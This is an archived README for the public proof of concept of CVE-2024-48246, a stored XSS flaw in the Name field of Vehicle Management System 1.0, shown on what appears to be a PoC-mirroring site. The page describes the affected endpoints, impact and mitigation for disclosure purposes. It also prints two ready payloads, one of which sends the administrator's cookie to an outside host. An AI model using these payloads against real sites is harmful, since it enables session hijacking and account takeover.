Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-48246 PoC — Vehicle Management System 跨站脚本漏洞

Source
https://github.com/ShadowByte1/CVE-2024-48246
Associated Vulnerability
Title:Vehicle Management System 跨站脚本漏洞 (CVE-2024-48246)
Description:Vehicle Management System是Warren Daloyan个人开发者的一个车辆管理系统。 Vehicle Management System 1.0版本存在跨站脚本漏洞,该漏洞源于Name参数存在存储型跨站脚本漏洞。
Description
Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)
Readme
# CVE-2024-48246
Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)

# Description

Vehicle Management System 1.0 contains a Stored Cross-Site Scripting (XSS) vulnerability in the Name parameter of /vehicle-management/booking.php. A malicious actor can inject malicious payloads into the Name field, which are stored and executed when an administrator views the booking list on /vehicle-management/bookinglist.php. This can lead to session hijacking or administrative account takeover.

# Affected Parameter

Name=

# Affected Endpoints

/vehicle-management/booking.php

/vehicle-management/bookinglist.php

# Vulnerability Details

Type: Cross-Site Scripting (XSS)

Vendor: Vehicle Management System

Affected Version: 1.0

# Attack Vectors

Guest User Attack:

A guest user inputs a payload into the Name parameter at /vehicle-management/booking.php.
The malicious payload gets stored and executed when an admin views /vehicle-management/bookinglist.php.
Example payload for session hijacking:

```
<img src=x onerror=this.src='http://oastify.com"+document.cookie>
```

# Alert Example:

Another payload can trigger an alert or perform other malicious actions without requiring cookies:

```
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
```

Note: A SQL Injection error may occur during payload submission, but it will still get stored and executed.

# Impact

Exploiting this vulnerability allows attackers to:

Execute arbitrary JavaScript in the context of the administrator’s session.

Hijack administrator sessions via stolen cookies.

Perform unauthorized actions or escalate privileges.

# Mitigation

Sanitize and encode user input for all parameters, especially Name.

Implement a Content Security Policy (CSP) to limit script execution.

Update to a patched version if available.

# Severity

High (CVSS: 8.2)

Attack Vector: Network

Privileges Required: Low

User Interaction: Partially Required (Admin views booking list)
File Snapshot

 [4.0K]  /data/pocs/ef6054890fb4abed8e2f8e5e3983f31306e61e1f
├── [1.0K]  LICENSE
└── [2.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.